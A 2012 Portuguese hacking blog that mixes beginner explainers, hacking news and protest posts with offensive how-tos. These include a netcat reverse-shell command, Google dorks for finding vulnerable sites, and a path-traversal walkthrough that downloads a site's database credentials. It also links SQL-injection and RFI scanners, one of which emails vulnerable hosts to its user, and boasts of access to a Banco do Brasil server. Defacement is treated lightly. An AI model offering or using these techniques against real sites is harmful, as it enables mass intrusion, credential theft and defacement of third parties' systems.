Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

segunda-feira, 3 de setembro de 2012

Entendendo Shell,root, exploit

Entendendo Shell,root, exploit 

 Olá a todos,sou o Adrian Lamo, estou me juntando ao Time do Google INURL e espero ajudar vocês!!! Como minha primeira matéria aqui trago uma básicão pra galera nova que está começando.



*****************
O que é Shell?
*****************

Shell não é aquele posto que tem em frente a sua casa, ou que você vai beber no Findi semana não. Uma Shell é um interpretador de comandos (interpreta os comandos inseridos pelo teclado), ou seja é o componente que faz a ligação entre o kernel e o usuário. Toda vez que o usuário digita um comando e pressiona |Enter|, a Shell interpreta os
comandos e manda para o Kernel.

Exemplo de Shell: C99

Tipos de Shell: Podem ser .txt ,.php, .gif...

************
Oque é Kernel
************

O Kernel é o centro do sistema operacional, sendo o componente que se comunica
diretamente com o hardware, sendo assim, precisa ser reescrito e compilado de acordo com a modificação da plataforma em questão . O Kernel compila e gerencia a requisiçãoseja usando memória, processador ou algum periférico.

**********************
Oque são Shell script?
********************** 

Shell scripts são conjuntos de comandos armazenados em um arquivo texto que são
executados seqüencialmente.

******************
[b]O que é um Exploit?
******************

Enquanto vocês leem isso,alguém deve estar pensando."Obaa vamos explodir quem???" Na verdade o Exploit é um programa que explora um bug em um software ou sistema
operacional específico. Na maioria das vezes,o exploit precisa estar rodando no mesmo ambiente para o qual ele foi projetado, depois que a compilação foi feita é só você o
rodar e obter o root.

******************
O que é root???
******************

root ,certamente não é o nome de sua vizinha gostosa,na verdade ele é o usuário que tem poder total sobre o sistema, ou seja,como o administrador no Windows ele pode
criar contas, excluir usuários, criar diretórios, etc.E com isso podemos fazer nosso
querio Deface...

**************
O que é Deface??
**************

Deixe seu site que eu lhe mostro haha..
Brincadeira, deface é o ato de desconfigurar, ou mesmo editar uma página.Para mais informações poderá
acessar a nossa parte de Deface aqui do Fórum, ou o meu Blog.

Link da Área Deface:

================
Esclarecimentos Finais
================

Espero que tenham gostado ai dessa dica,se gostaram clica no '+'
do tópico e add a minha reputação.Esse é um tuto básico,mas é pra isso que estamos aqui ensinar a galera que um dia vai nos substituir.. Abraços

Dúvidas, chorumelas, e outras coisitas podem pedir...

Gottfrid Svartholm, co fundador do site The Pirate Bay foi preso no Camboja

Gottfrid Svartholm, co fundador do site The Pirate Bay foi preso no Camboja


Gottfrid Svartholm, o co-fundador de um dos maiores, se não maior, site de torrent do mundo, o The Pirate Bay foi preso durante o final de semana no Camboja, mais exatamente na cidade Phnom Penh.

Ele estava sendo procurado pela justiça sueca desde o mês Abril deste ano, quadno o mesmo não compareceu perante as autoridades para cumprir sua pena.

De acordo com a polícia cambojana, o pedido de prisão veio do governo sueco, porém, os países tem um tratado de extradição e precisarão analisar o caso para dar procedimento nesta ação.

Além de um ano de prisão, Svartholm e os outros três criadores do site, terão que pagar uma multa de 3,6 milhões de dólares.

Espero que este caso seja semelhante ao do Kim Dotcom, e que ele seja liberado em breve. Vale lembrar que o The Pirate Bay não compartilha arquivos, você apenas clica em um link magnético no qual vai baixar de outros usuários que estão compartilhando, ele te mostra o caminho, só isso.

http://thepiratebay.se/  ~~~:)

Fonte:http://nerdpride.com.br/Tecnologia/gottfrid-svartholm-co-fundador-do-site-the-pirate-bay-foi-preso-no-camboja/

domingo, 2 de setembro de 2012

Defenda-se do SQL injection Script

Defenda-se do SQL injection Script

Hoje com a grande necessita que o mercado tem de ficar online, até o tio da quitanda da esquina tem um website.
Mais com grande numero de profissionais e de trabalhos que existe vem a questão de segurança seu site é seguro?

As vezes me deparo com situações no de fato ridículas referente valorização do Professional.
Digamos Tem dois profissionais que trabalham com Webdesign:

1º Profissional -  Te garante Segurança no script,SEO,Administração do site.
       Entrega com prazo de 10 a 15 dias depois que o conteudo entregue.
       Valor: 1,500.
2º Profissional -  SEO,Administração do site.
        Entrega com prazo de 5 a 8 dias depois que o conteudo entregue.
       Valor: 800,50.

Logica: "Logo o cliente pensa pra que eu quero segurança no meu site, não preciso disso tudo sem falar que o preço do n2 ta melhor."

Informando "NÃO SEJA ESSE CARA"!
Da mesma forma que temos informações de como fazer uma receita de bolo na internet, podemos ter informações de como invadir seu site em questões de clicks.

Um vídeo abaixa demonstra bem o que é um simples invasão.
O video se trata de Blind SQL injection no final do post tem o link de um tutorial como se defender dele.

Tutorial Blind SQL Injection - 2012




Script Ant - SQL_Injection


Recomento ler essa matéria também  tutorial.
Fonte do vídeo:http://www.lucaspeperaio.com.br/blog/blind-sql-injection

Buscar informações com Google Hacking referente ao CEH.

Essa dork vai pra galera do Garoa grupo Paranoia Hacker.


Essa dork vai pra galera do Garoa grupo Paranoia Hacker.

Buscar informações com Google Hacking referente ao  CEH.

+"Hacker Ético Certificado" = Significa:  Forçar o Google pesquisar o determinado parâmetro,
Assim ele pesquisa  "Hacker Ético Certificado"   significa que o conteudo do arquivo deve ser português.
Esta entre aspas  "Texto" para o Google intender que queres buscar a frase da forma que esta,
Ex:  +"Luiz Inacio Lula da Silva" , as vezes ele pesquisa  "Luiz"  no começo da pagina  "Inácio"  no fim e
"da Silva" vem de uma propaganda da pagina, este é o segredo das  "" aspas duplas nas pesquisas.

  CEH = Da um complemento na pesquisa mais uma referencia para garantir o resultado.

ext:pdf  = Determinar a extensão que o Google vai pesquisa no formato .PDF

Dork: +"Hacker Ético Certificado" CEH ext:pdf
 Só basta copiar:   +"Hacker Ético Certificado" CEH ext:pdf
 Colar no Google.

Paranoia Hacker


Paranoia Hacker  é uma atividade do Garoa focado em promover o conhecimento em (in)segurança da informação, que visa apresentar conceitos básicos, técnicas de defesa, ferramentas e mostrando as nuances dos ataques, buscando assim fomentar o conhecimento de forma prática - inclusive pensando em promover competições práticas de "capture the flag".
Nesta atividade buscaremos abordar técnicas de desenvolvimento seguro, exploit writer entre outros conhecimentos relacionados como insights afins.
O Paranoia Hacker foi criado por entusiastas de segurança da informação, cujo objetivo em comum é o espírito de disseminação de conhecimento e de colaboração. Esperamos que você faça parte desse time, dessa seleção.
O grupo funcionará basicamente por atividades periódicas, incluindo palestras e oficinas práticas! Todas as atividades são gratuitas e abertas a todos os interessados. Também não é preciso conhecimento prévio de Segurança: os novatos são bem vindos. A menos se for indicado o contrário, não há necessidade de inscrição prévia, basta aparecer.


O grupo tem como o objetivo evoluir progressivamente visando uma estrutura lógica de aprendizagem e formação, mas buscando sempre aproveitar as oportunidades de colaboração e voluntários que se oferecerem para ministrar conteúdos pertinentes aos objetivos do grupo.
As atividades e encontros serão definidas e anunciadas nesta página, bem como na lista de discussão do Garoa com antecedência. Além do mais, qualquer pessoa que esteja interessada em difundir o conhecimento pode se oferecer para ministrar uma atividade.
As atividades serão realizadas geralmente nas quartas-feiras a noite ou aos sábados, dependendo da disponibilidade do pessoal, e vão durar cerca de 2 horas cada.Mas atenção: poderão haver exceções para os dias da semana.
O evento acontece na sede do Garoa Hacker Clube. Para saber como chegar, veja aqui.


Garoa do Hacker: https://garoa.net.br/wiki/Paranoia_Hacker

Usando Netcat obter um shell remoto por r3boot3rAX

Usando Netcat obter um shell remoto | por r3boot3rAX


+ - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - +
| Usando Netcat obter um shell remoto | por r3boot3rAX 
+ - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - +

Hoje vamos falar sobre uma ferramenta popular, chamado "Netcat",
Muitas vezes referido como o "canivete suíço das redes",
Netcat é uma ferramenta que os administradores podem usar para ler e escrever dados
TCP ou UDP através da rede. Além disso, é extremamente útil para a depuração de rede e de ensaio.

Netcat oferece vários usos interessantes. Por exemplo, você pode fazê-lo
Ouvir uma determinada porta e executar um programa. Para isso, use o seguinte:

$ netcat -v -l -p 10111 -e "/bin/cat /etc/motd"

Isto diz netcat para escutar na porta 10111. Quando há uma conexão, ele diz netcat para executar
"/bin/cat /etc/motd,"que basicamente exibe o conteúdo do arquivo /etc/motd e sai.

Você também pode configurar o netcat em uma máquina para escutar as conexões de entrada e executá-lo
Em uma máquina remota para se conectar à máquina local e servir-se de um shell bash. Por exemplo,
Em uma máquina local com um endereço IP de 192.168.5.10, você usaria o seguinte:

$ netcat -v -l -p 10111

Na máquina remota, você usaria:

$ netcat 192.168.5.10 10111 -e /bin/bash

Isto diz a instância netcat na máquina remota para conectar-se à instância netcat escutando na 192.168.5.10
E servir-se de um shell bash da máquina remota, que estará disponível na máquina local.
Usando o exemplo netcat em 192.168.5.10, você pode executar comandos shell no host remoto.

Texto traduzido.
Fonte:https://www.facebook.com/legions.united

Votação de lei que pune crimes digitais sai da pauta do Senado


O projeto de lei que tipifica e pune crimes eletrônicos teve sua votação excluída da pauta do Senado por não ter passado antes pela Comissão de Constituição e Justiça. Dois dias atrás, o PL 35/2012, também conhecido como ‘Lei Dieckman’, começou a sair do papel após ter sido aprovado pela Comissão de Comissão de Ciência, Tecnologia, Inovação, Comunicação e Informática (CCT). A proposta era que a votação fosse incluída extra pauta, com requerimento de urgência para o texto ser examinado com rapidez, o que não aconteceu.

A lei é um complemento criminal ao Marco Civil da Internet, legislação desenvolvida pelo próprio governo federal e que definirá direitos e deveres dos internautas brasileiros, devendo ser votada ainda em setembro. Na visão do projeto original de cibercrimes, os provedores de internet seriam obrigados a armazenar todos os logs (registros de atividades dos internautas) por pelo menos três anos, mas, como a nova lei não cita o tema, fica valendo o que será estipulado no Marco Civil (guarda de logs por um ano).

O texto aprovado prevê prisão de três meses a um ano para quem “devassar dispositivo informático alheio, conectado ou não a rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo, instalar vulnerabilidades ou obter vantagem ilícita". Mesma punição para quem "produz, oferece, distribui, vende ou difunde programa de computador com o intuito de permitir a invasão de computador alheio".

A pena será agravada – prisão de seis meses a dois anos – se a invasão resultar em obtenção de conteúdo de comunicações eletrônicas privadas, segredos comerciais e industriais e informações sigilosas. A punição aumenta de um terço à metade se o crime for praticado contra os presidentes dos três poderes (legislativo, executivo e judiciário) nos três níveis – federal, estadual e municipal. No caso de falsificação de documentos, como cartão de crédito e de débito, a pena é prisão de um a cinco anos e multa. 

Programa Dork Scanner Ver 2.0

Dork Scanner Ver 2.0
Feito em C#
Efetua suas busca por ums 4 tipos de Bot.
Já é composto por 3 arquivos txt já com dorks de pesquisa editáveis RFI,PHP,ASP

Programa Dork Scanner Ver 2.0
Programa feito por: p0!z0neR

Baixar: http://optimusolucoes.com.br/Scanner-Dorks-2.0.rar

sexta-feira, 31 de agosto de 2012

FBI prende novo hacker suspeito de integrar LulzSec


FBI prende novo hacker suspeito de integrar LulzSec



A polícia norte-americana deteve ontem mais um suspeito de envolvimento nos ataques à Sony. O alegado membro do grupo de hacktivistas LulzSec entregou-se ontem às autoridades, no Estado do Arizona, relata o The Telegraph.

Raynaldo Rivera, de 20 anos, é acusado de conspiração e de ter comprometido um computador protegido, no âmbito da investigação movida na sequência dos ataques aos sistemas informáticos da Sony, registados em maio e junho de 2011.

Caso seja declarado culpado, Rivera pode pegar até 15 anos de prisão. Ele e outros hackers são acusados de roubar informações dos sistemas da Sony Corp. e da Sony Pictures em maio e junho de 2011, ataque anunciado pelo perfil do grupo hacker no Twitter.

Após a invasão, o LulzSec publicou os nomes, datas de nascimento, endereço, e-mails, números de telefone e senhas de milhares de pessoas que haviam participado em promoções promovidas pela Sony.

Pelos cálculos das autoridades, o custo total do vazamento de informações custou à empresa US$ 600 mil.

Documentos revelados em março afirmam que um líder do grupo, conhecido como Sabu e cujo nome verdadeiro é Héctor Monsegur, se declarou culpado dos atos de invasão. Logo depois, Sabu teria dado informações sobre seus cúmplices ao FBI. Na mesma época, cinco suspeitos de serem dirigentes de outro gruop hacker, o Anonymous, e também integrantes do LulzSec, foram acusados pela polícia norte-americana.


Fonte:http://anonopsbrazil.blogspot.com.br/2012/08/fbi-prende-novo-hacker-suspeito-de.html

Uniscan vulneráveis sql-injection

Uniscan vulneráveis sql-injection


Uniscan
###############################
# Uniscan project #
# http://www.uniscan.com.br/ #
###############################
V. 3.0

-h help
-u example: https://www.example.com/
-f with list of url's
-T default: 15
-v number of a page, default: 2
-t of a connection in seconds, default: 10
-r of the crawler, default: 15000
-s of one request in bytes, default: 1048576 [1MB]
-o default: Vuls.txt
-b Uniscan go to background
-p example: www.example.com
-l example: 8080
Option -u or -f is required, all others no.

usage:
[1] perl uniscan.pl -u http://www.example.com/
[2] perl uniscan.pl -f /home/user/file.txt
[3] perl uniscan.pl -u https://www.example.com/
[4] perl uniscan.pl -u http://www.example.com/ -T 30 -t 20 -r 1000 -s 524288 -o vulnerables.txt
[5] perl uniscan.pl -f /home/user/file.txt -T 30 -t 20 -r 1000 -s 524288 -o vulnerables.txt -b
[6] perl uniscan.pl -u https://www.example.com/ -T 20 -t 20 -r 200 -b -p 192.168.1.5 -l 8001


Sem segredo.

http://sourceforge.net/projects/uniscan/


#FailSecurityBR tem acesso BANCO DO BRASIL (Servidor Goiano)

#FailSecurityBR tem acesso BANCO DO BRASIL (Servidor Goiano)


Reportando mais um acesso que o grupo   FailSecurityBR teve Dessa vez o acesso foi obtido no  BANCO DO BRASIL (Servidor Goiano).

#FailSecurityBR avisa o arquivo exposto a seguir não contem dados do site, é apenas uma parte do arquivo bb3071130.txt (São codigos de barra gerados pelo servidor goiano de ontem para hoje).
Caso não entenda o motivo de eu ter postado isso, estude um pouco sobre Engenharia Social ^^

Archive from ~~> BANCO DO BRASIL (Servidor Goiano) <~~

Archive name: bb3071130.txt
Site of Banco do Brasil : www.bb.com.br
Site Failed on SQL query:

SQL query blind (having fail) + ADMIN_access sv ↓

Essas informações estão contidas no pastbin do #grupo

Scanner Bot - ERROR - SQL [FastBot]

Scanner Bot - ERROR - SQL [FastBot]
Scritp perl

Criar o arquivo onde fica suas dork's
Suas dorks = input.txt
Onde sera salvo os link vulneráveis  = output_injection.txt

Perl fastbot.pl

Scanner Bot - ERROR - SQL [FastBot]


Sera salva suas vul.

Link baixar:http://pastebin.com/feiuNhX5

Script Teste SQL 1.0 Googleinurl - Brasil Sendmail

Script Teste SQL 1.0 Googleinurl - Brasil Sendmail

Script Teste SQL 1.0 Googleinurl - Brasil Sendmail
By: Cleiton Pinheiro.
Blog.inurl.com.br

GoogleINURL - Brasil pesquisa avançada

Pode ajuda ADM que desejam testar todas url do seu site só inseri-las  no textarea.
"As url previamente filtradas"
EX:
www.site.com.br/index.php?id=654654
www.site.com.br/main.php?id=6546548888
www.site.com.br/photos/all/open.php?cod=65

As url com erro seram enviadas para o email determinado na textbox.

Intuito do script é o estudo.

Script

Made In Brasil um dos melhores forum's que tenho prazer de participar.


Made In Brasil um dos melhores fóruns que tenho prazer de participar.
Galera venho aqui com prazer divulgar um fórum de qualidade.
Primeiro forum que tenho prazer de conhecer que realmente voltado ao hacking, não falo essa merda que tu veras em alguns forum's que o intuito é tratar mal quem tem menos conhecimento ou prejudicar alguém.
Lá pelo que pude perceber os usuários tem o intuito de compartilhar,aprender, ensinar,ajudar.
Alguns motivos que me fez ficar no forum e começar postar também lá.
Os ADM não se intitulam deuses, 
Não tem um incentivo ao Deface prejudicial,
O forum ainda é pequeno então tú terás mais atenção da galera nos posts tirando duvidas e compartilhado conhecimento.

Quem quiser entrar pode entrar registre-se que recomendo o forum.
Galera venho aqui com prazer divulgar um fórum de qualidade.
Primeiro forum que tenho prazer de conhecer que realmente voltado ao hacking, não falo essa merda que tu veras em alguns forum's que o intuito é tratar mal quem tem menos conhecimento ou prejudicar alguém.
Lá pelo que pude perceber os usuários tem o intuito de compartilhar,aprender, ensinar,ajudar.
Alguns motivos que me fez ficar no forum e começar postar também lá.
Os ADM não se intitulam deuses, 
Não tem um incentivo ao Deface prejudicial,
O forum ainda é pequeno então tú terás mais atenção da galera nos posts tirando duvidas e compartilhado conhecimento.

Quem quiser entrar pode entrar registre-se que recomendo o forum.

Galera venho aqui com prazer divulgar um fórum de qualidade.
Primeiro forum que tenho prazer de conhecer que realmente voltado ao hacking, não falo essa merda que tu veras em alguns forum's que o intuito é tratar mal quem tem menos conhecimento ou prejudicar alguém.
Lá pelo que pude perceber os usuários tem o intuito de compartilhar,aprender, ensinar,ajudar.
Alguns motivos que me fez ficar no forum e começar postar também lá.
Os ADM não se intitulam deuses,
Não tem um incentivo ao Deface prejudicial,
O forum ainda é pequeno então tú terás mais atenção da galera nos posts tirando duvidas e compartilhado conhecimento.

Quem quiser entrar pode entrar registre-se que recomendo o forum.

Forum: http://madeinbrazil.umforum.net/forum

[ Compartilhar,Ajudar,Pensar ] =  Hacking é isso.
!(Hacking) Não é roubar Cartão de credito isso é só um ladrão mesmo.

quarta-feira, 29 de agosto de 2012

Explorando vulnerabilidade Fopen



Vamos falar de falhas.

Deis uma volta no Google "Uma busca avançada", percebi que 40% de alguns sites estão vulneráveis ao Attack FOPEN é algo simples e de certa forma avassalador se feito por alguém Mal-intencionado.

Referencia:

http://php.net/manual/pt_BR/function.fopen.php

Dork:

site:br inurl:download.php?file=
site:br inurl:baixar.php?arquivo=
inurl:dow.php?file= 

Só exemplos de dorks use sua criatividade.


Com Certeza alguns de vocês já fizeram algum download isso é #fato!.
Hoje vamos dar uma olhada no como o código PHP se comporta no dow.

Site ex: wwww.sitevull.com.br/baixar.php?arquivo=tutorial.pdf

O que acontece é que os GET's passados na URL estão sem validação, Assim com um simples trocar de parâmetro é possível baixar arquivos do site alvo.

ex: wwww.sitevull.com.br/baixar.php?arquivo=index.php
ex: wwww.sitevull.com.br/baixar.php?arquivo=index.html

Assim vai mais digamos, que no mesmo site você tem o seguinte cenário.

wwww.sitevull.com.br/admin

Vamos baixar o index da pasta Admin.

ex: wwww.sitevull.com.br/baixar.php?arquivo=../admin/index.php

Dentro da index Admin #fato que tem uma include ou require pra validar as informações passadas no form.

vamos dizer que encontramos no nosso alvo fictício um include para o arquivo de conexão com banco.


include("/secret/config.php");
?>

Vamos na url vulnerável e baixar o arquivo config.php

ex: wwww.sitevull.com.br/baixar.php?arquivo=../secret/config.php

Conteúdo do tipo.

        $user_site = "web_teste";
$user_site = "testepp";
$senha_site = "testeppg";
$host = "sitevull.com.br ";//IP TESTE
$conexao = mssql_connect($host,$user_site,$senha_site) or die("Erro");
$banco = "gppepe";


Pronto conseguimos acesso ao banco do site sem usar um script ou programa.

Forma errada sem validação:



Forma menos errada sem validação:



Exploit Mac OS, Linux e Windows: cuidado com a nova vulnerabilidade no Java

Attackers Pounce on Zero-Day Java Exploit

Attackers Pounce on Zero-Day Java Exploit


Uma nova praga foi descoberta esta semana e está sendo executada em ataques contra usuários do Windows para enviar aos micros o Trojan conhecido como Poison Ivy Remote Access. A praga, que está em processo inicial, ainda não foi amplamente difundida. O que mais preocupa é seu potencial para ser utilizada por outros desenvolvedores de malwares em um futuro próximo. Saiu no Intego.

Ao que parece, a praga aparece em todos os navegadores e funciona em algumas versões do Linux, do OS X 10.7 e superiores e também do Windows. Portanto, se você estiver utilizando a última versão atualizada do Java 7 (1.7, até o update 6), é melhor tomar cuidado.

Até o momento, não existe nenhum patch disponível para esta façanha - por isso, é altamente recomendável que você desabilite o Java em seu computador, antes que seu sistema seja atualizado e corrija o código.

Atacantes aproveitaram uma brecha de segurança previamente desconhecida no software Java da Oracle onipresente para invadir sistemas vulneráveis. Até agora, os ataques que exploram essa fraqueza têm sido alvo e não generalizada, mas parece que o código de exploração agora é público e está sendo dobrado em ferramentas de ataque mais amplamente disponível como Metasploit e explorar kits como BlackHole.

Um módulo Metasploit desenvolvido para atingir este Java 0-dia.
Notícias da vulnerabilidade (CVE-2012-4681) surgiu no final da semana passada em um post no blog um pouco esparso FireEye, que disse que a façanha parecia estar a trabalhar contra a última versão do Java 7, que é a versão 1.7, atualização 6. Esta manhã, os pesquisadores M. André Dimino & Mila Parkour publicou detalhes adicionais sobre os ataques direcionados visto até agora, confirmando que o dia-zero afeta Java 7 Atualização de 0 a 6, mas não parece afetar o Java 6 e abaixo.

Relatórios iniciais indicaram que o código de exploração trabalhou contra todas as versões do Internet Explorer, Firefox e Opera, mas não funcionou contra o Google Chrome. Mas de acordo com rápida 7, existe um módulo que Metasploit em desenvolvimento com sucesso implanta essa exploração contra Chrome (em pelo menos Windows XP).

Além disso, há indícios de que essa exploração será em breve rolou para o exploit kit BlackHole. Contactado via mensagem instantânea, o curador da ferramenta de ataque amplamente utilizada comercial confirmou que o código de exploração, agora pública funcionou muito bem, e disse que pretende incorporá-lo em BlackHole tão cedo quanto hoje. "O preço de tal façanha uma se fosse vendido privada seria de cerca de 100.000 dólares", escreveu Paunch, o apelido usado pelo autor BlackHole.

Oracle Java movido a um ciclo de correção trimestral, e sua próxima atualização não está prevista até outubro. Enquanto isso, é uma boa idéia ou desligue Java de seu navegador ou desinstalá-lo de seu computador completamente.


Usuários do Windows podem descobrir se eles tem o Java instalado e qual a versão, visitando java.com e clicar no botão "Tenho Java? link. Usuários de Mac podem usar o recurso de atualização de software para verificar se há atualizações disponíveis Java.

Se você usar principalmente Java porque algum site ou programa que você tem em seu sistema - como o OpenOffice ou o Freemind - exige isso, você ainda pode reduzir drasticamente o risco de Java ataca apenas desativando o plugin no seu browser. Neste caso, eu gostaria de sugerir uma abordagem em duas navegador. Se você costuma navegar na Web com o Firefox, por exemplo, considere desabilitar o plugin Java no Firefox, e em seguida, usando um navegador alternativo (Chrome, IE9, Safari, etc) com Java habilitado para navegar apenas o site que exige.

Para instruções específicas do navegador para desativar o Java, clique aqui.

Se você precisa usar Java, especialistas em segurança estão preparando um patch não oficial para o programa que deve atenuar essa vulnerabilidade, mas ele está sendo oferecido em uma base por-pedido neste momento. Um certo número de especialistas que conheço e respeito que garantiu a integridade deste patch, mas a instalação de patches de terceiros não deve ser feito de ânimo leve. Note-se que a regredir para a última versão do Java 6 (Java / JRE 6 Update 34) é certamente uma opção, mas não muito bom. Se você não precisa de Java, se livrar dele, e se você precisa dele para aplicações específicas ou sites, limitar o uso de Java para esses sites e aplicações, usando um navegador secundário para esse fim.

Fonte:http://www.intego.com/mac-security-blog/new-java-zero-day-exploit-shows-multi-platform-development/
Fonte:http://krebsonsecurity.com/2012/08/attackers-pounce-on-zero-day-java-exploit/

Google disponibiliza detalhes de seu algoritmo de buscas

Google disponibiliza detalhes de seu algoritmo de buscas


Você já parou pra pensar como o Google sabe tudo aquilo que você quer, no momento que escreve a palavra em seu campo de busca? Isso tudo é resultado de um poderoso algoritmo, que aprende e entende exatamente o que o usuário deseja ver.

Isso é resultado de muito trabalho e milhares de linhas de programação, que aperfeiçoam esse sistema todos os dias.

Em uma iniciativa do Google chamada "Under the Hood" (Debaixo do capô, em português), foram disponibilizados alguns detalhes sobre o funcionamento do algoritmo de buscas mais famoso do mundo. Uma das informações mais interessantes é que esse algoritmo não possui uma versão final, já que sofre correções e recebe novos recursos diariamente. Confira alguns dados:

O Google lida com mais de 1 bilhão de buscas diariamente;
Foram gastos mais de 1000 anos no desenvolvimento do algoritmo (equivalente a todas as horas de trabalho de todos os membros da equipe);
Desde 2003, o Google trouxe mais de 450 bilhões de resultados únicos;
Cada resultado percorre em média 2400 quilômetros para chegar ao usuário;
A cada ano, mais de 500 melhorias são feitas no algoritmo do Google (isso dá mais de uma por dia).
No vídeo abaixo, vários funcionários da empresa explicam algumas peculiaridades do algoritmo, como por exemplo cada alteração realizada pela equipe do Google é extensivamente testada dentro de uma "sandbox" (ambiente protegido utilizado apenas para testar uma nova funcionalidade).

Um outro ponto mostrado no vídeo é o de como eles chegaram a conclusão de qual é o melhor jeito de implementar o famoso recurso "Você quis dizer...", que corrige erros ortográficos ou de digitação. Confira!




E você, prefere o Google ou outro mecanismo de busca, como o Yahoo! ou Bing?


Fonte:http://canaltech.com.br/noticia/google/Google-disponibiliza-detalhes-de-seu-algoritmo-de-buscas/

terça-feira, 28 de agosto de 2012

Script Para teste URL + CMD


Script Para teste URL + CMD

Script PHP com intuito de testar varias URL ao mesmo tempo, simulando uma requisição http Método GET.
Definindo o Arquivo TXT que contem as URL por padrão devem sem uma embaixo da outra
Ex:
http://site01.com.br/index.php?id=
http://site02.com.br/index.php?main=
http://site03.com.br/index.php?ok=
...Assim por diante.

Seu script de Teste pode ser um pbot enfim fica da sua escolha.
Existe um script Testing RFI Send envia sites vulneráveis para seu e-mails
Script teste: http://pastebin.com/krZi3W8E

GoogleINURL - Brasil pesquisa avançada.
Grupo voltado a busca detalhada no motor de pesquisa google. Utilizando operadores especiais google O que é Google hacking?
É uma pirataria de informática técnica que utiliza o
Google Search e outras Google aplicativos para encontrar falhas de segurança
na configuração e código de computador.

SCRIPT PARA ESTUDOS.

By GoogleINURL
blog.inurl.com.br



segunda-feira, 27 de agosto de 2012

Script Para Scanner maquinas VNC vulneráveis.

Scanner feito em PERL Voltado para IRC
Scanner feito em PERL Voltado para IRC

# IRC Scanner - VNC VULN SCAN
 # by Nexen && CrashOveriDe
 # Multi-threaded scan for OpenVNC 4.11 authentication bypass.
 # Based on Tyler Krpata's Perl scanning code.


Script Para teste RFI vulneráveis enviados para Email.



Script Para teste RFI vulneráveis enviados para Email.

Pode ser usada em Bot Scanner, Xroot e outros programas que simulação alguma requisição http assim injetando o script na URL. já testa e envia pro Email.

Quem já usou o Xroot sabe como usar, Ou até mesmo um simples script de Spammer.

Exemplo:http://www.sitevul.com.br/index.php?id=http://script.com/RFI.txt?

Chegara da seguinte forma no seu email:

Nome: Linux a1-whl-a79.host.teste 2.6.18-194.32.1.el5 #1 SMP Fri Jan 7 11:50:24 BRST 2011 x86_64
Safe Mode:Off
URL: www.sitevul.com.br/index.php?id=http://script.com/RFI.txt?
Data: 07-31-33, 27-08-12, 3131 3133 1 Monpm12 239
Caminho: /home/sitevull/public_html/index.php
System: Linux a1-whl-a79.host.teste 2.6.18-194.32.1.el5 #1 SMP Fri Jan 7 11:50:24 BRST 2011 x86_64


Imagina testar isso um por um com lista de 1500 sites.

Dica use o Xroot ou outro programa que simule uma requisição HTTP pra injetar o script na Get do site:


OBS: procure a variável chamada Email troque o valor fixo que seria meu Email pelo seu.

Code:

Statsgram: descubra informações de qualquer site da web.

Statsgram: descubra  informações de qualquer site da web.


Statsgram: descubra  informações de qualquer site da web.

Info referente: DNS,HTML,TAGS,VISITANTES,SCRIPTS e outros.

e você possui um site, blog ou apenas deseja pesquisar um pouco mais a respeito de algum endereço da web, o Statsgram te ajuda a obter diversas informações de uma maneira simples, rápida e gratuita. 
Trata-se de um serviço web que, em segundos, lhe dá várias estatísticas de um site ou blogapenas digitando a URL que você deseja pesquisar, sem qualquer tipo de registro prévio.
Quando você realiza uma pesquisa no Statsgram, um relatório é emitido com diversos dados, como, por exemplo, o número de visitantes por dia, local do servidor, um mapa que mostra a localização mundial dos visitantes da página, sites semelhantes etc. Detalhes um pouco mais profundos também são mostrados, como as buscas mais populares realizadas dentro do site, por exemplo.
Os números são estimados, portanto, podem não ser muito corretos às vezes. Mas, de qualquer maneira, não deixa de ser uma ferramenta interessante.

Acessar:http://statsgram.com


Fim do aumento salarial parlamentar acima da inflação

Fim do aumento salarial parlamentar acima da inflação


No uso do direito assegurado pelos arts. 1°, 14, III, e 61 da Constituição Federal e arts. 13 e 14 da Lei 9.709/98, subscrevo o projeto de lei de Iniciativa Popular,que torna o povo brasileiro apto a exercer diretamente sua cidadania, e cuja ementa é a seguinte: “Altera a Lei 9.709, de 18 de novembro de 1998, e revogam-se dispositivos em contrário ”. Art. 1. Essa Lei altera a Lei 9.709, de 18 de novembro de 1998, que passa a vigorar com as seguintes alterações: Art.2. § 2o O referendo é convocado com posterioridade a ato legislativo ou administrativo, cumprindo ao povo a respectiva ratificação ou rejeição. No caso dos ocupantes de cargos eletivos, ou cargos por eles nomeados, quando receberem reajuste de vencimentos acima da inflação do período, será obrigatório a convocação do Referendo, a fim de que o povo decida diretamente se aceita ou não tal reajuste. Passando a valer o novo reajuste somente após a decisão popular. Projeto na integra em http://goo.gl/34a4L

Por que isto é importante

Qual empregado em todo o mundo consegue SE conceder um aumento salarial? Nenhum! Então por que nossos representantes votam o próprio aumento salarial com reajustes absurdos que elevam o custo desses representantes as alturas. Se nós os elegemos então nós somos os responsáveis por esse aumento.
Esse projeto de lei visa interromper esses abusos cometidos por nossos representantes, fazendo com que o aumento salarial acima da inflação seja decidido através de um plebiscito. Ou seja, é o fim dos aumentos abusivos a não ser que a população concorde.

sexta-feira, 17 de agosto de 2012

7 de Setembro - Protesto a nível nacional PARTICIPE!


7 de Setembro - Protesto a nível nacional PARTICIPE!

[Eu vou para]



Estaremos atualizando 

Missão - Voto Aberto Parlamentar 
- Fim do Foro Privilegiado ... 
- Corrupção para Crime Hediondo

AM - Manaus - 16h no Parque dos Bilhares https://facebook.com/events/419566814721832/ 

AP- Macapá 16h Assembleia Legislativa - http://www.facebook.com/events/107150566094168/ 

BA - Camaçari - 15h na Praça Desembargador Montenegro -
ttps://facebook.com/events/149887781810625/ 

BA - Dias d'Ávila - Apoio a Camaçari - 15h na Praça Desembargador Montenegrohttps://facebook.com/events/217107068408997/ 

BA - Itamarajú - 16h na Praça Castelo Branco https://facebook.com/events/330524563685509/ 

BA - Jequié - "Definindo -suporte a salvador" 

BA - Salvador - 14:30 Farol da Barra https://facebook.com/events/299077756845549/ 

CE - Juazeiro do norte - ? no Cirão (em frente ao Batalhão da PM)https://facebook.com/events/305869396162066/ 

ES - Cachoeiro de Itapemirim - https://facebook.com/events/236664239780231/ 

ES- Vitória - http://www.facebook.com/events/381691355223174/ 

GO - Goiânia - https://www.facebook.com/events/365688396812087/ 

MA- Pedreiras - 16h na Praça do Cinquentenário "SUCAM"https://facebook.com/events/132571313542700/ 

MA - São Luiz - ? no Anel Viario https://facebook.com/events/236374819804464/ 

